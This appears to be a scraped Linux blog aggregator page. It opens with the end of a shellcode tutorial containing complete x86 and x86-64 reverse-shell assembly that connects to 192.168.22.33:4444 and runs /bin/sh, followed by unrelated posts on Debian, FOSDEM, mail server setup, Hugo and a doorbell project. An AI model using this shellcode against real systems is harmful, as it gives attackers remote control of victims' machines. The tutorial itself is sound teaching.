So, if we have a working function, why can’t we just use that as shellcode? Well, even if we compile position independent code (-pie -fPIE in gcc), this code will still have many library calls in it. In a normal program, this is no problem, as it will be linked with the C library and run fine. However, this relies on the loader doing the right thing, including the placement of the PLT and GOT. When we inject shellcode, we only inject the machine code, and don’t include any data areas necessary for the location of the GOT.

What about statically linking the C library to avoid all these problems? While that has the potential to work, any constants (like the strings for the IP address and the shell path) will be located in a different section of the binary, and so the code will be unable to reference those. (Unless we inject that section as well and fixup the relative addresses, but in that case, the complexity of our loader approaches the complexity of our entire shellcode.)

Reverse Shell in x86

My shellcode below will be written with the intent of being as clear as possible as a learning instrument. Consequently, it is neither the shortest possible shellcode, nor is it free of “bad characters” (null bytes, newlines, etc.). It is also written as NASM assembly.

; Do the steps to setup a socket (1)
; SYS_socket = 1
mov ebx, 1
; Setup the arguments to socket() on the stack.
push 0 ; Flags = 0
push 1 ; SOCK_STREAM = 1
push 2 ; AF_INET = 2
; Move a pointer to these values to ecx for socketcall.
mov ecx, esp
; We're calling SYS_SOCKETCALL
mov eax, 0x66
; Get the socket
int 0x80

; Time to setup the struct sockaddr_in (2), (3)
; push the address so it ends up in network byte order
; 192.168.22.33 == 0xC0A81621
push 0x2116a8c0
; push the port as a short in network-byte order
; 4444 = 0x115c
mov ebx, 0x5c11
push bx
; push the address family, AF_INET = 2
mov ebx, 0x2
push bx

; Let's establish the connection (4)
; Save address of our struct
mov ebx, esp
; Push size of the struct
push 0x10
; Push address of the struct
push ebx
; Push the socketfd
push eax
; Put the pointer into ecx
mov ecx, esp
; We're calling SYS_CONNECT = 3 (via SYS_SOCKETCALL)
mov ebx, 0x3
; Preserve sockfd
push eax
; Call SYS_SOCKETCALL
mov eax, 0x66
; Make the connection
int 0x80

; Let's duplicate the FDs from our socket. (5)
; Load the sockfd
pop ebx
; STDERR
mov ecx, 2
; Calling SYS_DUP2 = 0x3f
mov eax, 0x3f
; Syscall!
int 0x80
; mov to STDOUT
dec ecx
; Reload eax
mov eax, 0x3f
; Syscall!
int 0x80
; mov to STDIN
dec ecx
; Reload eax
mov eax, 0x3f
; Syscall!
int 0x80

; Now time to execve (6)
; push "/bin/sh\0" on the stack
push 0x68732f
push 0x6e69622f
; preserve filename
mov ebx, esp
; array of arguments
xor eax, eax
push eax
push ebx
; pointer to array in ecx
mov ecx, esp
; null envp
xor edx, edx
; call SYS_execve = 0xb
mov eax, 0xb
; execute the shell!
int 0x80

Reverse Shell in x86-64

This will be very similar to the x86 shellcode, but adjusted for x86-64. I will use the proper x86-64 system calls and 64-bit registers where possible.

; Do the steps to setup a socket (1)
; Setup the arguments to socket() in appropriate registers
xor rdx, rdx ; Flags = 0
mov rsi, 1 ; SOCK_STREAM = 1
mov rdi, 2 ; AF_INET = 2
; We're calling SYS_socket
mov rax, 41
; Get the socket
syscall

; Time to setup the struct sockaddr_in (2), (3)
; push the address so it ends up in network byte order
; 192.168.22.33 == 0xC0A81621
push 0x2116a8c0
; push the port as a short in network-byte order
; 4444 = 0x115c
mov bx, 0x5c11
push bx
; push the address family, AF_INET = 2
mov bx, 0x2
push bx

; Let's establish the connection (4)
; Save address of our struct
mov rsi, rsp
; size of the struct
mov rdx, 0x10
; Our socket fd
mov rdi, rax
; Preserve sockfd
push rax
; Call SYS_connect
mov rax, 42
; Make the connection
syscall

; Let's duplicate the FDs from our socket. (5)
; Load the sockfd
pop rdi
; STDERR
mov rsi, 2
; Calling SYS_dup2 = 0x21
mov rax, 0x21
; Syscall!
syscall
; mov to STDOUT
dec rsi
; Reload rdi
mov rax, 0x21
; Syscall!
syscall
; mov to STDIN
dec rsi
; Reload rdi
mov rax, 0x21
; Syscall!
syscall

; Now time to execve (6)
; push "/bin/sh\0" on the stack
push 0x68732f
push 0x6e69622f
; preserve filename
mov rdi, rsp
; array of arguments
xor rdx, rdx
push rdx
push rdi
; pointer to array in rsi
mov rsi, rsp
; call SYS_execve = 59
mov rax, 59
; execute the shell!
syscall

Conclusion

The structural similarities between either assembly implementation and the C source code should be fairly evident. When I write shellcode, I usually write out the list of steps involved, then write a version in C, and finally translate to the assembly for the shellcode. I'm a bit of a control freak, so whenever I need custom shellcode, I go straight to the assembly.

Let me know if there’s a particular shellcode payload you’re interested in me covering or if you have feedback on the style or usefulness of these posts.

The Fridge: Ubuntu Weekly Newsletter Issue 551

Planet Ubuntu - Mon, 29/10/2018 - 9:34pm

Welcome to the Ubuntu Weekly Newsletter, Issue 551 for the week of October 21 – 27, 2018. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

Daniel Pocock: FOSDEM 2019 Real-Time Communications Call for Participation

Planet Ubuntu - Mon, 29/10/2018 - 8:57pm

FOSDEM is one of the world's premier meetings of free software developers, with over five thousand people attending each year. FOSDEM 2019 takes place 2-3 February 2019 in Brussels, Belgium.

This email contains information about:

  • Real-Time communications dev-room and lounge,
  • speaking opportunities,
  • volunteering in the dev-room and lounge,
  • social events (the legendary FOSDEM Beer Night and Saturday night dinners provide endless networking opportunities),
  • the Planet aggregation sites for RTC blogs
Call for participation - Real Time Communications (RTC)

The Real-Time Communications dev-room and Real-Time lounge is about all things involving real-time communication, including: XMPP, SIP, WebRTC, telephony, mobile VoIP, codecs, peer-to-peer, privacy and encryption. The dev-room is a successor to the previous XMPP and telephony dev-rooms. We are looking for speakers for the dev-room and volunteers and participants for the tables in the Real-Time lounge.

The dev-room is only on Sunday, 3rd of February 2019. The lounge will be present for both days.

To discuss the dev-room and lounge, please join the Free RTC mailing list.

To be kept aware of major developments in Free RTC, without being on the discussion list, please join the Free-RTC Announce list.

Speaking opportunities

Note: if you used FOSDEM Pentabarf before, please use the same account/username

Real-Time Communications dev-room: deadline 23:59 UTC on 2nd of December. Please use the Pentabarf system to submit a talk proposal for the dev-room. On the "General" tab, please look for the "Track" option and choose "Real Time Communications devroom". Link to talk submission.

Other dev-rooms and lightning talks: some speakers may find their topic is in the scope of more than one dev-room. It is encouraged to apply to more than one dev-room and also consider proposing a lightning talk, but please be kind enough to tell us if you do this by filling out the notes in the form.

You can find the full list of dev-rooms on this page and apply for a lightning talk at https://fosdem.org/submit

Main track: the deadline for main track presentations is 23:59 UTC 3 November. Leading developers in the Real-Time Communications field are encouraged to consider submitting a presentation to the main track.

First-time speaking?

FOSDEM dev-rooms are a welcoming environment for people who have never given a talk before. Please feel free to contact the dev-room administrators personally if you would like to ask any questions about it.

Submission guidelines

The Pentabarf system will ask for many of the essential details. Please remember to re-use your account from previous years if you have one.

In the "Submission notes", please tell us about:

  • the purpose of your talk
  • any other talk applications (dev-rooms, lightning talks, main track)
  • availability constraints and special needs

You can use HTML and links in your bio, abstract and description.

If you maintain a blog, please consider providing us with the URL of a feed with posts tagged for your RTC-related work.

We will be looking for relevance to the conference and dev-room themes, presentations aimed at developers of free and open source software about RTC-related topics.

Please feel free to suggest a duration between 20 minutes and 55 minutes but note that the final decision on talk durations will be made by the dev-room administrators based on the received proposals. As the two previous dev-rooms have been combined into one, we may decide to give shorter slots than in previous years so that more speakers can participate.

Please note FOSDEM aims to record and live-stream all talks. The CC-BY license is used.

Volunteers needed

To make the dev-room and lounge run successfully, we are looking for volunteers:

  • FOSDEM provides video recording equipment and live streaming, volunteers are needed to assist in this
  • organizing one or more restaurant bookings (depending upon the number of participants) for the evening of Saturday, 2 February
  • participation in the Real-Time lounge
  • helping attract sponsorship funds for the dev-room to pay for the Saturday night dinner and any other expenses
  • circulating this Call for Participation (this text) to other mailing lists
Social events and dinners

The traditional FOSDEM beer night occurs on Friday, 1st of February.

On Saturday night, there are usually dinners associated with each of the dev-rooms. Most restaurants in Brussels are not so large so these dinners have space constraints and reservations are essential. Please subscribe to the Free-RTC mailing list for further details about the Saturday night dinner options and how you can register for a seat.

Spread the word and discuss

If you know of any mailing lists where this CfP would be relevant, please forward this email. If this dev-room excites you, please blog or microblog about it, especially if you are submitting a talk.

If you regularly blog about RTC topics, please send details about your blog to the planet site administrators:

Project         Planet site                                      Admin contact
All projects    Free-RTC Planet (http://planet.freertc.org)      contact planet@freertc.org
XMPP            Planet Jabber (http://planet.jabber.org)         contact ralphm@ik.nu
SIP             Planet SIP (http://planet.sip5060.net)           contact planet@sip5060.net
SIP (Español)   Planet SIP-es (http://planet.sip5060.net/es/)    contact planet@sip5060.net

Please also link to the Planet sites from your own blog or web site as this helps everybody in the free real-time communications community.

Contact

For any private queries, contact us directly using the address fosdem-rtc-admin@freertc.org and for any other queries please ask on the Free-RTC mailing list.

The dev-room administration team:

I was a podcast guest on The REPL

Planet Debian - Fri, 26/10/2018 - 10:00pm

Daniel Compton hosted me on his Clojure podcast, The REPL, where I talked about Debian, packaging Leiningen, and the Clojure ecosystem in Debian. It's got everything: spooky abandoned packages, anarchist collectives, software security policies, and Debian release cycles. Absolutely no shade was thrown at other distros.

Give it a listen:


Download: MP3

More Q&A

After the podcast was published, Ivan Sagalaev wrote me with a great question about how the different versions of Clojure in Ubuntu 18.04 work:

First of all, THANK YOU for making sudo apt install leiningen work! It's so much better and more consistent than sourcing bash scripts :-)

I have a quick question for you. After installing leiningen and clojure on Ubuntu 18.04 I see that lein repl starts with clojure 1.8.0, while the clojure package itself seems to be independent and is version 1.9.0. How is it possible? I frankly haven't even seen lein downloading its own clojure.jar...

I replied:

Leiningen is "ahead-of-time (AOT) compiled", which is a fancy way of saying that the Leiningen you download from Ubuntu is pre-built. This means it is already compiled to Java bytecode, which can be run directly by Java. I ship the binary Leiningen package as an "uberjar", which means all its dependencies are also included inside the Leiningen jar.

Leiningen depends on and is built with Clojure 1.8, so the Leiningen uberjar in Debian also depends on Clojure 1.8. The "clojure" package in 18.04 defaults to installing Clojure 1.9, but that can be installed simultaneously with the "clojure1.8" package that Leiningen depends on in order to build. You can change your default Clojure to 1.8 using alternatives.

When you launch lein repl, by default the Clojure 1.8 runtime that's compiled in is used. If you run lein repl in the root of a Clojure 1.9 project, Leiningen will download Clojure 1.9 from Clojars and launch a 1.9 repl. If you want to use the Clojure 1.9 shipped with Debian, you can change :local-repo to point at /usr/share/maven-repo, but be careful to also set :offline? to true so you don't try to install things into the system maven repo by accident.

Elana Hashman https://hashman.ca/ hashman.ca

smartmontools

Planet Debian - Fri, 26/10/2018 - 11:46am

I don't do much Debian stuff these days (too busy) but I have adopted some packages over the last year. This has happened when a package that I rely on was lacking person-power and at risk of being removed from Debian. I thought I should write about some of them. First up, smartmontools.

smartmontools let you query the "Self-Monitoring, Analysis and Reporting Technology" (S.M.A.R.T.) information in your computer's storage devices (hard discs and solid-state equivalents), as well as issue S.M.A.R.T. commands to them, such as instructing them to execute self-tests.

I rescued smartmontools for the Debian release in 2015, but I thought that was a one-off. Since I've just done it again I'm now considering it something I (co-)maintain [1].

S.M.A.R.T. can, in theory, give you advance warning about a disc that is "not well" and could stop working. In practice, it isn't very good at predicting disc failures [2] — which might explain why the package hasn't received more attention — but it can still be useful: last year it helped me to detect an issue with excessive drive-head parking I was experiencing on one of my drives.

  1. Personally I think the notion of single-maintainers for packages is old and destructive, and I think it should be the exception rather than the norm. Unfortunately it's still baked into a lot of our processes, policies and tools. ↩

jmtd https://jmtd.net/log/ Jonathan Dowland's Weblog

Santiago Zarate: Setting up postfix, dovecot and sieve

Planet Ubuntu - Fri, 26/10/2018 - 2:00am
The horror

While trying to set up my mail system, I ran into multiple tutorials to figure out what was the best way to avoid multiple error messages, mainly because you, like me (you silly human!), simply copied and pasted random stuff from Stack Overflow, and tutorials on HowtoForge and places like that…

The mistakes

You tried something like this

spamassassin unix - n n - - pipe flags=DROhu user=vmail argv=/usr/bin/spamc -e /usr/lib/dovecot/deliver -f ${sender} -d ${user}@${nexthop}

or this:

mailbox_transport = lmtp:unix:private/lmtp
virtual_transport = lmtp:unix:private/lmtp

The pain

so you ended up with something that looks similar to this:

Oct 24 01:13:24 nergal postfix/pipe[10207]: fatal: get_service_attr: unknown username: vmail
Oct 24 01:13:25 nergal postfix/master[10104]: warning: process /usr/lib/postfix/bin//pipe pid 10207 exit status 1
Oct 24 01:13:25 nergal postfix/qmgr[10106]: warning: private/spamassassin socket: malformed response
Oct 24 01:13:25 nergal postfix/master[10104]: warning: /usr/lib/postfix/bin//pipe: bad command startup -- throttling
Oct 24 01:13:25 nergal postfix/qmgr[10106]: warning: transport spamassassin failure -- see a previous warning/fatal/panic logfile record for the problem description

Resignation

So what worked for me was to leave the service in the master.cf as I had it working…

and simply add to master.cf

spamassassin unix - n n - - pipe flags=R user=app argv=/usr/bin/spamc -e /usr/sbin/sendmail -oi -f ${sender} ${recipient}

and in the main.cf

mailbox_command = /usr/lib/dovecot/deliver

The light

Sieve filtering started to work after these changes :)

Serge Hallyn: Outdoors laptop (part 2)

Planet Ubuntu - Fri, 26/10/2018 - 12:59am

Some time ago I posted about wanting an outdoor laptop. The first option I listed was a panasonic toughbook. Recently (a year and a half later) I finally ordered one. I ordered from bobjohnson.com, because the people there are a class act who’ve been calmly answering my questions for a long time.

Some highlights:

* It has a transflective display. This means that it is emissive, but also uses reflected sunlight to boost brightness, up to 6000 nits. In comparison, my previous thinkpad was 350 nit (unusable sometimes even in shade), and my macbook was 500 nit. With this laptop, I can leave the display on 25% brightness and move from a dark basement to hurt-my-skin bright sunlight.

* It’s ‘fully rugged’, so using it in rain or dust storms should not be an issue. (I lost 4 GB of RAM in my thinkpad to dust.)

* It has a shoulder strap ($20 extra) screwed on solidly.

* It has a touchscreen with stylus. (To use this under ubuntu 18.04 I had to install xserver-xorg-input-evdev and remove xserver-xorg-input-libinput. Note just installing evdev was not enough) I may look like a dweeb, but I prefer this to smudging my screen.
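For reference, the evdev switch mentioned in the last point amounts to something like this on Ubuntu 18.04 (followed by restarting the X session):

sudo apt install xserver-xorg-input-evdev
sudo apt remove xserver-xorg-input-libinput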

The laptop I got is a CF-19 MK6. This is several years old and refurbished. The reason I went with this instead of a new toughbook (besides price) is because, as far as I can tell, only the CF-19 MK5 through MK8 have the transflective display. The replacement for the CF-19 (the CF-20) may have a better screen (I’ve not seen it), but it is not transflective and comes in at “only” 1000 nits. Same with the slightly larger non-convertible laptops.

Mind you, there is (I trust) a reason these screens did not take off – the colors are kind of washed out, and it’s low resolution. But for reading kernel code by the pool without draining the battery in 1 hr, the only thing I can imagine being better is an eink screen.

The CF-19 is compact: it’s a 10″ (convertible) netbook. This keyboard is more cramped than on my old s100 netbook. I do actually kind of like the keys – they have a good travel depth and a nice click. But it’s weird going back to a full-size keyboard.

The first time I measured the battery life, it shut down with the battery listed at 36% remaining, after a mere 3 hours. Panasonic had advertised 10 hours for this laptop. Three hours was unacceptable, and I was about ready to send it back. But, reading the powertop output, I noticed that the sound card was listed as taking tons of battery power. So for my next run I did a powertop --auto-tune, and got over 4 hours battery life. Then I noticed the bluetooth radio doing the same, so I did rmmod btusb. These are now all done on startup by systemd. The battery still stops at 35%, which takes getting used to, but it’s acceptable.
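A minimal sketch of how such tweaks can be run at boot via systemd (the unit name and binary paths here are my guesses, not necessarily what is actually in use):

# /etc/systemd/system/powersave-tweaks.service (hypothetical)
[Unit]
Description=Apply power-saving tweaks at boot

[Service]
Type=oneshot
ExecStart=/usr/sbin/powertop --auto-tune
ExecStart=/sbin/rmmod btusb

[Install]
WantedBy=multi-user.target

Enable it once with systemctl enable powersave-tweaks.service and the tweaks are applied on every boot.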

4.5 hours is still limiting, so I picked up a second battery and an external charger. I can charge one battery while using the other, or take both batteries along for a longer trip.

In summary – I may have found my outdoors laptop. I’d still prefer it be thinner, with a slightly larger, mechanical keyboard, and have 12-hour battery life, delivered on a unicorn…

(Here is an attempt to show the screen in very bright sunlight. It’s hard to get a good photo, since the camera wants to play its own games.)

Julian Andres Klode: Migrated website from ikiwiki to Hugo

Planet Ubuntu - Enj, 25/10/2018 - 8:42md

So, I’ve been using ikiwiki for my website since 2011. At the time, I was hosting the website on a tiny hosting package included in a DSL contract - nothing dynamic possible, so a static site generator seemed like a good idea. ikiwiki was a good social fit at the time, as it was packaged in Debian and developed by a Debian Developer.

Today, I finished converting it to Hugo.

Why?

I did not really have a huge problem with ikiwiki, but I recently converted my blog from wordpress to hugo and it seemed to make sense to have one technology for both, especially since I don’t update the website very often and forget ikiwiki’s special things.

One thing that was somewhat annoying is that I built a custom ikiwiki plugin for the menu in my template, so I had to clone its repository into ~/.ikiwiki every time, rather than having a self-contained website. Well, it was a submodule of my dotfiles repo.

Another thing was that ikiwiki had a lot of git integration, and when you build your site it tries to push things to git repositories and all sorts of weird stuff – Hugo just does one thing: It builds your page.

One thing that Hugo does a lot better than ikiwiki is the built-in server, which allows you to run `hugo server` and get a local HTTP URL you can open in the browser, with live-reload as you save files. Super convenient to check changes (and of course, for writing this blog post)!
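That really is the whole workflow:

hugo server    # serves the site with live reload, by default on http://localhost:1313/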

Also, in general, Hugo feels a lot more modern. ikiwiki is from 2006, Hugo is from 2013. Especially recent Hugo versions added quite a few features for asset management.

  • Fingerprinting of assets like css (inserting hash into filename) - ikiwiki just contains its style in style.css (and your templates in other statically named files), so if you switch theming details, you could break things because the CSS the browser has cached does not match the CSS the page expects.
  • Asset minification - Hugo can minify CSS and JavaScript for you. This means browsers have to fetch less data.
  • Asset concatenation - Hugo can concatenate CSS and JavaScript. This allows you to serve only one file per type, reducing the number of round trips a client has to make.
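For reference, wiring the three features above into a template looks roughly like this with Hugo Pipes (the file names are only examples):

{{ $css := slice (resources.Get "css/base.css") (resources.Get "css/site.css") }}
{{ $bundle := $css | resources.Concat "css/bundle.css" | minify | fingerprint }}
<link rel="stylesheet" href="{{ $bundle.RelPermalink }}" integrity="{{ $bundle.Data.Integrity }}">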

There’s also proper theming support, so you can easily clone a theme into the themes/ directory, or add it as a submodule like I do for my blog. But I don’t use it for the website yet.

Oh, and Hugo automatically generates sitemap.xml files for your website, teaching search engines which pages exist and when they have been modified.

I also like that it’s written in Go vs in Perl, but I think that’s just another more modern type of thing. Gotta keep up with the world!

Basic conversion

The first part of the conversion was to split the repository of the website: ikiwiki puts templates into a templates/ subdirectory of the repository and mixes all other content. Hugo on the other hand splits things into content/ (where pages go), layouts/ (page templates), and static/ (other files).

The second part was to inject the frontmatter into the markdown files. See, ikiwiki uses shortcuts like this to set up the title, and gets its dates from git:

[[!meta title="My page title"]]

on the other hand, Hugo uses frontmatter - some YAML at the beginning of the markdown, and specifies the creation date in there:

--- title: "My page title" date: Thu, 18 Oct 2018 21:36:18 +0200 ---

You can also have lastmod in there when modifying it, but I set enableGitInfo = true in config.toml so Hugo picks up the mtime from the git repo.

I wrote a small script to automate those steps, but it was obviously not perfect (also, it inserted lastmod, which it should not have).
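The gist of such a script, sketched from the description above rather than from the actual code, could look like this:

#!/bin/bash
# Rough sketch: pull the title out of the ikiwiki meta directive and the
# creation date out of git, then prepend Hugo frontmatter. Not the real script.
shopt -s globstar
for f in content/**/*.mdown; do
  title=$(sed -n 's/.*\[\[!meta title="\([^"]*\)"\]\].*/\1/p' "$f")
  date=$(git log --follow --format=%aI --reverse -- "$f" | head -n 1)
  tmp=$(mktemp)
  { printf -- '---\ntitle: "%s"\ndate: %s\n---\n' "$title" "$date"
    grep -v '\[\[!meta title=' "$f"; } > "$tmp"
  mv "$tmp" "$f"
done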

One thing it took me some time to figure out was that index.mdown needs to become _index.md in the content/ directory of Hugo, otherwise no pages below it are rendered - not entirely obvious.

The theme

Converting the template was surprisingly easy: it was just a matter of replacing <TMPL_VAR BASEURL> and friends with {{ .Site.BaseURL }} and friends - the names are basically the same, just sometimes there’s .Site at the front of it.

Then I had to take care of the menu generation loop. I had my bootmenu plugin for ikiwiki which allowed me to generate menus from the configuration file. The template for it looked like this:

<TMPL_LOOP BOOTMENU>
  <TMPL_IF FIRSTNAV>
    <li <TMPL_IF ACTIVE>class="active"</TMPL_IF>><a href="<TMPL_VAR URL>"><TMPL_VAR PAGE></a></li>
  </TMPL_IF>
</TMPL_LOOP>

I converted this to:

{{ $currentPage := . }}
{{ range .Site.Menus.main }}
  <li class="{{ if $currentPage.IsMenuCurrent "main" . }}active{{ end }}">
    <a href="{{ .URL }}">
      {{ .Pre | safeHTML }} <span>{{ .Name }}</span>
    </a>
    {{ .Post }}
  </li>
{{ end }}

this allowed me to configure my menu in config.toml like this:

[menu]
  [[menu.main]]
    name = "dh-autoreconf"
    url = "/projects/dh-autoreconf"
    weight = -110

I can also specify pre and post parts and a right menu, and I use pre and post in the right menu to render a few icons before and after items, for example:

[[menu.right]]
  pre = "<i class='fab fa-mastodon'></i>"
  post = "<i class='fas fa-external-link-alt'></i>"
  url = "https://mastodon.social/@juliank"
  name = "Mastodon"
  weight = -70

Setting class="active" on the menu item does not seem to work yet, though; I think I need to find out the right code for that…

Fixing up the details

Once I was done with those steps, the next stage was to convert ikiwiki shortcodes to something Hugo understands. This took four parts:

The first part was converting tables. In ikiwiki, tables look like this:

[[!table format=dsv data="""
Status|License|Language|Reference
Active|GPL-3+|Java|[github](https://github.com/julian-klode/dns66)
"""]]

The generated HTML table had the class="table" set, which the bootstrap framework needs to render a nice table. Converting that to a straightforward markdown hugo table did not work: Hugo did not add the class, so I had to convert pages with tables in them to the mmark variant of markdown, which allows classes to be set like this {.table}, so the end result then looked like this:

{.table}
Status|License|Language|Reference
------|-------|--------|---------
Active|GPL-3+|Java|[github](https://github.com/julian-klode/dns66)

I’ll be able to get rid of this in the future by using the bootstrap sources and then having table inherit the .table properties, but this requires Sass or Less, and I only have the CSS at the moment, so using mmark was slightly easier.

The second part was converting ikiwiki links like [[MyPage]] and [[my title|MyPage]] to Markdown links. This was quite easy, the first one became [MyPage](MyPage) and the second one [my title](MyPage).

The third part was converting custom shortcuts: I had [[!lp <number>]] to generate a link LP: #<number> to the corresponding launchpad bug, and [[!Closes <number>]] to generate Closes: #<number> links to the Debian bug tracker. I converted those to normal markdown links, but I could have converted them to Hugo shortcodes. But meh.

The fourth part was about converting some directory indexes I had. For example, [[!map pages="projects/dir2ogg/0.12/* and ! projects/dir2ogg/0.12/*/*"]] generated a list of all files in projects/dir2ogg/0.12. There was a very useful shortcode for that posted on the Hugo documentation, I used a variant of it and then converted pages like this to {{< directoryindex path="/static/projects/dir2ogg/0.12" pathURL="/projects/dir2ogg/0.12" >}}. As a bonus, the new directory index also generates SHA256 hashes for all files!

Further work

The website is using an old version of bootstrap, and the theme is not split out yet. I’m not sure if I want to keep a bootstrap theme for the website, seeing as the blog theme is Bulma-based - it would be easier to have both use bulma.

I also might want to update both the website and the blog by pushing to GitHub and then using CI to build and push it. That would allow me to write blog posts when I don’t have my laptop with me. But I’m not sure, I might lose control if there’s a breach at travis.

Julian Andres Klode https://blog.jak-linux.org/post/ Posts on Blog of Julian Andres Klode

MQTT enabling my doorbell

Planet Debian - Enj, 25/10/2018 - 8:05md

One of the things about my home automation journey is that I don’t always start out with a firm justification for tying something into my setup. There’s not really any additional gain at present from my living room lights being remotely controllable. When it came to tying the doorbell into my setup I had a clear purpose in mind: I often can’t hear it from my study.

The existing device was a Byron BY101. This consists of a 433MHz bell-push and a corresponding receiver that plugs into a normal mains socket for power. I tried moving the receiver to a more central location, but then had issues with it not reliably activating when the button was pushed. I could have attempted the inverse of Colin’s approach and tried to tie in a wired setup to the wireless receiver, but that would have been too simple.

I first attempted to watch for the doorbell via a basic 433MHz receiver. It seems to use a simple 16 bit identifier followed by 3 bits indicating which tone to use (only 4 are supported by mine; I don’t know if other models support more). The on/off timings are roughly 1040ms/540ms vs 450ms/950ms. I found I could reliably trigger the doorbell using these details, but I’ve not had a lot of luck with reliable 433MHz reception on microcontrollers; generally I use PulseView in conjunction with a basic Cypress FX2 logic analyser to capture from a 433MHz receiver and work out timings. Plus I needed a receiver that could be placed close enough to the bell-push to reliably pick it up.

Of course I already had a receiver that could decode the appropriate codes - the doorbell! Taking it apart revealed a PSU board and separate receiver/bell board. The receiver uses a PT4318-S with a potted chip I assume is the microcontroller. There was an HT24LC02 I2C EEPROM on the bottom of the receiver board; monitoring it with my BusPirate indicated that the 16 bit ID code was stored in address 0x20. Sadly it looked like the EEPROM was only used for data storage; only a handful of values were read on power on.

Additionally there were various test points on the board; probing while pressing the bell-push led to the discovery of a test pad that went to 1.8v when a signal was detected. Perfect. I employed an ESP82661 in the form of an ESP-07, sending out an MQTT message containing “ON” or “OFF” as appropriate when the state changed. I had a DS18B20 lying around so I added that for some temperature monitoring too; it reads a little higher due to being inside the case, but not significantly so.

All of this ended up placed in the bedroom, which conveniently had a socket almost directly above the bell-push. Tying it into Home Assistant was easy:

binary_sensor:
  - platform: mqtt
    name: Doorbell
    state_topic: "doorbell/master-bedroom/button"
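While setting this up, watching the topic from another machine is an easy way to confirm the ESP is actually publishing (the broker hostname here is just an example):

mosquitto_sub -h mqtt.example.org -t 'doorbell/master-bedroom/button' -v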

I then needed something to alert me when the doorbell was pushed. Long term perhaps I’ll add some sounders around the house hooked in via MQTT, and there’s a Kodi notifier available, but that’s only helpful when the TV is on. I ended up employing my Alexa via Notify Me:

notify:
  - name: alexa
    platform: rest
    message_param_name: notification
    resource: https://api.notifymyecho.com/v1/NotifyMe
    data:
      accessCode: !secret notifyme_key

and then an automation in automations.yaml:

- id: alexa_doorbell
  alias: Notify Alexa when the doorbell is pushed
  trigger:
    - platform: state
      entity_id: binary_sensor.doorbell
      to: 'on'
  action:
    - service: notify.alexa
      data_template:
        message: "Doorbell rang at {{ states('sensor.time') }}"

How well does this work? Better than expected! A couple of days after installing everything we were having lunch when Alexa chimed; the door had been closed and music playing, so we hadn’t heard the doorbell. Turned out to be an unexpected delivery which we’d otherwise have missed. It also allows us to see when someone has rung the doorbell when we were in - useful for seeing missed deliveries etc.

(Full disclosure: When initially probing out the mains doorbell for active signals I did so while it was plugged into the mains. My ‘scope is not fully isolated it seems and at one point I managed to trip the breaker on the mains circuit and blow the ringer part of the doorbell. Ooops. I ended up ordering an identical replacement (avoiding the need to replace the bell-push) and subsequently was able to re-use the ‘broken’ device as the ESP8266 receiver - the receiving part was still working, just not making a noise. The new receiver ended up in the living room, so the doorbell still sounds normally.)

  1. I have a basic ESP8266 MQTT framework I’ve been using for a bunch of devices based off Tuan PM’s work. I’ll put it up at some point. 

Jonathan McDowell https://www.earth.li/~noodles/blog/ Noodles' Emptiness

Ubuntu Podcast from the UK LoCo: S11E33 – Thirty-Three Teeth

Planet Ubuntu - Enj, 25/10/2018 - 5:30md

This week we’ve been playing with DXVK and Volumio. We discuss Wifi getting a new naming scheme, interpreting the Linux CoC, Motorola partnering with iFixIt, KDE adding scaling for GTK applications and what’s been going on in the Ubuntu Community.

It’s Season 11 Episode 33 of the Ubuntu Podcast! Alan Pope, Mark Johnson and guest presenter Andy Jesse are connected and speaking to your brain.

In this week’s show:

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.
